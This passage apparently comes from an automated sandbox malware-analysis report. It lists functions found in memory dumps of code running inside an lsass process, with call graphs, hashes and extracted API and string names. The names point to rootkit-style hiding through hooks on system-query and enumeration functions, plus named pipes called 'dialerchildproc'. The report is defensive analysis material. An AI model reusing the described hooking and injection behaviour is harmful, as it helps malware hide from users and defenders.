                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791
                                                                                Function 00000140AE861D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2
                                                                                Function 00000140ADFC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 326 140adfc6910-140adfc6916 327 140adfc6918-140adfc691b 326->327 328 140adfc6951-140adfc695b 326->328 329 140adfc691d-140adfc6920 327->329 330 140adfc6945-140adfc6984 call 140adfc6fc0 327->330 331 140adfc6a78-140adfc6a8d 328->331 332 140adfc6938 __scrt_dllmain_crt_thread_attach 329->332 333 140adfc6922-140adfc6925 329->333 349 140adfc698a-140adfc699f call 140adfc6e54 330->349 350 140adfc6a52 330->350 334 140adfc6a9c-140adfc6ab6 call 140adfc6e54 331->334 335 140adfc6a8f 331->335 341 140adfc693d-140adfc6944 332->341 337 140adfc6927-140adfc6930 333->337 338 140adfc6931-140adfc6936 call 140adfc6f04 333->338 347 140adfc6aef-140adfc6b20 call 140adfc7190 334->347 348 140adfc6ab8-140adfc6aed call 140adfc6f7c call 140adfc6e1c call 140adfc7318 call 140adfc7130 call 140adfc7154 call 140adfc6fac 334->348 339 140adfc6a91-140adfc6a9b 335->339 338->341 360 140adfc6b31-140adfc6b37 347->360 361 140adfc6b22-140adfc6b28 347->361 348->339 358 140adfc6a6a-140adfc6a77 call 140adfc7190 349->358 359 140adfc69a5-140adfc69b6 call 140adfc6ec4 349->359 354 140adfc6a54-140adfc6a69 350->354 358->331 376 140adfc69b8-140adfc69dc call 140adfc72dc call 140adfc6e0c call 140adfc6e38 call 140adfcac0c 359->376 377 140adfc6a07-140adfc6a11 call 140adfc7130 359->377 366 140adfc6b7e-140adfc6b94 call 140adfc268c 360->366 367 140adfc6b39-140adfc6b43 360->367 361->360 365 140adfc6b2a-140adfc6b2c 361->365 372 140adfc6c1f-140adfc6c2c 365->372 387 140adfc6bcc-140adfc6bce 366->387 388 140adfc6b96-140adfc6b98 366->388 373 140adfc6b4f-140adfc6b5d call 140adfd5780 367->373 374 140adfc6b45-140adfc6b4d 367->374 379 140adfc6b63-140adfc6b78 call 140adfc6910 373->379 391 140adfc6c15-140adfc6c1d 373->391 374->379 376->377 429 140adfc69de-140adfc69e5 __scrt_dllmain_after_initialize_c 376->429 377->350 399 140adfc6a13-140adfc6a1f call 140adfc7180 377->399 379->366 379->391 389 140adfc6bd5-140adfc6bea call 140adfc6910 387->389 390 140adfc6bd0-140adfc6bd3 387->390 388->387 396 140adfc6b9a-140adfc6bbc call 140adfc268c call 140adfc6a78 388->396 389->391 408 140adfc6bec-140adfc6bf6 389->408 390->389 390->391 391->372 396->387 423 140adfc6bbe-140adfc6bc6 call 140adfd5780 396->423 416 140adfc6a45-140adfc6a50 399->416 417 140adfc6a21-140adfc6a2b call 140adfc7098 399->417 413 140adfc6bf8-140adfc6bff 408->413 414 140adfc6c01-140adfc6c11 call 140adfd5780 408->414 413->391 414->391 416->354 417->416 428 140adfc6a2d-140adfc6a3b 417->428 423->387 428->416 429->377 430 140adfc69e7-140adfc6a04 call 140adfcabc8 429->430 430->377
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300
                                                                                Function 00000140AE86CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                                • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                                  • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                                  • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                                  • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3
                                                                                Function 00000140AE862244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41
                                                                                Function 00000140AE86A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 705 140ae86a544-140ae86a5ac call 140ae86b414 708 140ae86a5b2-140ae86a5b5 705->708 709 140ae86aa13-140ae86aa1b call 140ae86c748 705->709 708->709 710 140ae86a5bb-140ae86a5c1 708->710 712 140ae86a5c7-140ae86a5cb 710->712 713 140ae86a690-140ae86a6a2 710->713 712->713 717 140ae86a5d1-140ae86a5dc 712->717 715 140ae86a963-140ae86a967 713->715 716 140ae86a6a8-140ae86a6ac 713->716 718 140ae86a9a0-140ae86a9aa call 140ae869634 715->718 719 140ae86a969-140ae86a970 715->719 716->715 720 140ae86a6b2-140ae86a6bd 716->720 717->713 721 140ae86a5e2-140ae86a5e7 717->721 718->709 731 140ae86a9ac-140ae86a9cb call 140ae867940 718->731 719->709 722 140ae86a976-140ae86a99b call 140ae86aa1c 719->722 720->715 724 140ae86a6c3-140ae86a6ca 720->724 721->713 725 140ae86a5ed-140ae86a5f7 call 140ae869634 721->725 722->718 728 140ae86a894-140ae86a8a0 724->728 729 140ae86a6d0-140ae86a707 call 140ae869a10 724->729 725->731 739 140ae86a5fd-140ae86a628 call 140ae869634 * 2 call 140ae869d24 725->739 728->718 732 140ae86a8a6-140ae86a8aa 728->732 729->728 744 140ae86a70d-140ae86a715 729->744 736 140ae86a8ac-140ae86a8b8 call 140ae869ce4 732->736 737 140ae86a8ba-140ae86a8c2 732->737 736->737 753 140ae86a8db-140ae86a8e3 736->753 737->718 743 140ae86a8c8-140ae86a8d5 call 140ae8698b4 737->743 773 140ae86a62a-140ae86a62e 739->773 774 140ae86a648-140ae86a652 call 140ae869634 739->774 743->718 743->753 745 140ae86a719-140ae86a74b 744->745 750 140ae86a887-140ae86a88e 745->750 751 140ae86a751-140ae86a75c 745->751 750->728 750->745 751->750 754 140ae86a762-140ae86a77b 751->754 755 140ae86a9f6-140ae86aa12 call 140ae869634 * 2 call 140ae86c6a8 753->755 756 140ae86a8e9-140ae86a8ed 753->756 758 140ae86a874-140ae86a879 754->758 759 140ae86a781-140ae86a7c6 call 140ae869cf8 * 2 754->759 755->709 760 140ae86a900 756->760 761 140ae86a8ef-140ae86a8fe call 140ae869ce4 756->761 764 140ae86a884 758->764 786 140ae86a804-140ae86a80a 759->786 787 140ae86a7c8-140ae86a7ee call 140ae869cf8 call 140ae86ac38 759->787 769 140ae86a903-140ae86a90d call 140ae86b4ac 760->769 761->769 764->750 769->718 784 140ae86a913-140ae86a961 call 140ae869944 call 140ae869b50 769->784 773->774 778 140ae86a630-140ae86a63b 773->778 774->713 790 140ae86a654-140ae86a674 call 140ae869634 * 2 call 140ae86b4ac 774->790 778->774 783 140ae86a63d-140ae86a642 778->783 783->709 783->774 784->718 794 140ae86a80c-140ae86a810 786->794 795 140ae86a87b 786->795 806 140ae86a815-140ae86a872 call 140ae86a470 787->806 807 140ae86a7f0-140ae86a802 787->807 811 140ae86a676-140ae86a680 call 140ae86b59c 790->811 812 140ae86a68b 790->812 794->759 796 140ae86a880 795->796 796->764 806->796 807->786 807->787 815 140ae86a686-140ae86a9ef call 140ae8692ac call 140ae86aff4 call 140ae8694a0 811->815 816 140ae86a9f0-140ae86a9f5 call 140ae86c6a8 811->816 812->713 815->816 816->755
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782
                                                                                Function 00000140ADFC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 584 140adfc9944-140adfc99ac call 140adfca814 587 140adfc99b2-140adfc99b5 584->587 588 140adfc9e13-140adfc9e1b call 140adfcbb48 584->588 587->588 589 140adfc99bb-140adfc99c1 587->589 591 140adfc99c7-140adfc99cb 589->591 592 140adfc9a90-140adfc9aa2 589->592 591->592 596 140adfc99d1-140adfc99dc 591->596 594 140adfc9aa8-140adfc9aac 592->594 595 140adfc9d63-140adfc9d67 592->595 594->595 597 140adfc9ab2-140adfc9abd 594->597 599 140adfc9d69-140adfc9d70 595->599 600 140adfc9da0-140adfc9daa call 140adfc8a34 595->600 596->592 598 140adfc99e2-140adfc99e7 596->598 597->595 602 140adfc9ac3-140adfc9aca 597->602 598->592 603 140adfc99ed-140adfc99f7 call 140adfc8a34 598->603 599->588 604 140adfc9d76-140adfc9d9b call 140adfc9e1c 599->604 600->588 610 140adfc9dac-140adfc9dcb call 140adfc6d40 600->610 607 140adfc9c94-140adfc9ca0 602->607 608 140adfc9ad0-140adfc9b07 call 140adfc8e10 602->608 603->610 618 140adfc99fd-140adfc9a28 call 140adfc8a34 * 2 call 140adfc9124 603->618 604->600 607->600 611 140adfc9ca6-140adfc9caa 607->611 608->607 622 140adfc9b0d-140adfc9b15 608->622 615 140adfc9cac-140adfc9cb8 call 140adfc90e4 611->615 616 140adfc9cba-140adfc9cc2 611->616 615->616 629 140adfc9cdb-140adfc9ce3 615->629 616->600 621 140adfc9cc8-140adfc9cd5 call 140adfc8cb4 616->621 652 140adfc9a48-140adfc9a52 call 140adfc8a34 618->652 653 140adfc9a2a-140adfc9a2e 618->653 621->600 621->629 626 140adfc9b19-140adfc9b4b 622->626 631 140adfc9c87-140adfc9c8e 626->631 632 140adfc9b51-140adfc9b5c 626->632 633 140adfc9ce9-140adfc9ced 629->633 634 140adfc9df6-140adfc9e12 call 140adfc8a34 * 2 call 140adfcbaa8 629->634 631->607 631->626 632->631 635 140adfc9b62-140adfc9b7b 632->635 637 140adfc9cef-140adfc9cfe call 140adfc90e4 633->637 638 140adfc9d00 633->638 634->588 639 140adfc9c74-140adfc9c79 635->639 640 140adfc9b81-140adfc9bc6 call 140adfc90f8 * 2 635->640 648 140adfc9d03-140adfc9d0d call 140adfca8ac 637->648 638->648 644 140adfc9c84 639->644 665 140adfc9bc8-140adfc9bee call 140adfc90f8 call 140adfca038 640->665 666 140adfc9c04-140adfc9c0a 640->666 644->631 648->600 663 140adfc9d13-140adfc9d61 call 140adfc8d44 call 140adfc8f50 648->663 652->592 669 140adfc9a54-140adfc9a74 call 140adfc8a34 * 2 call 140adfca8ac 652->669 653->652 657 140adfc9a30-140adfc9a3b 653->657 657->652 662 140adfc9a3d-140adfc9a42 657->662 662->588 662->652 663->600 684 140adfc9c15-140adfc9c72 call 140adfc9870 665->684 685 140adfc9bf0-140adfc9c02 665->685 673 140adfc9c0c-140adfc9c10 666->673 674 140adfc9c7b 666->674 690 140adfc9a8b 669->690 691 140adfc9a76-140adfc9a80 call 140adfca99c 669->691 673->640 675 140adfc9c80 674->675 675->644 684->675 685->665 685->666 690->592 694 140adfc9a86-140adfc9def call 140adfc86ac call 140adfca3f4 call 140adfc88a0 691->694 695 140adfc9df0-140adfc9df5 call 140adfcbaa8 691->695 694->695 695->634
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                                                Function 00000140AE86F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                                Function 00000140AE86104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                                Function 00000140AE86D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                                Function 00000140AE867510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                                Function 00000140AE869DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                                Function 00000140AE873DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                                Function 00000140AE863790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                                Function 00000140AE865B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                                Function 00000140AE862F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
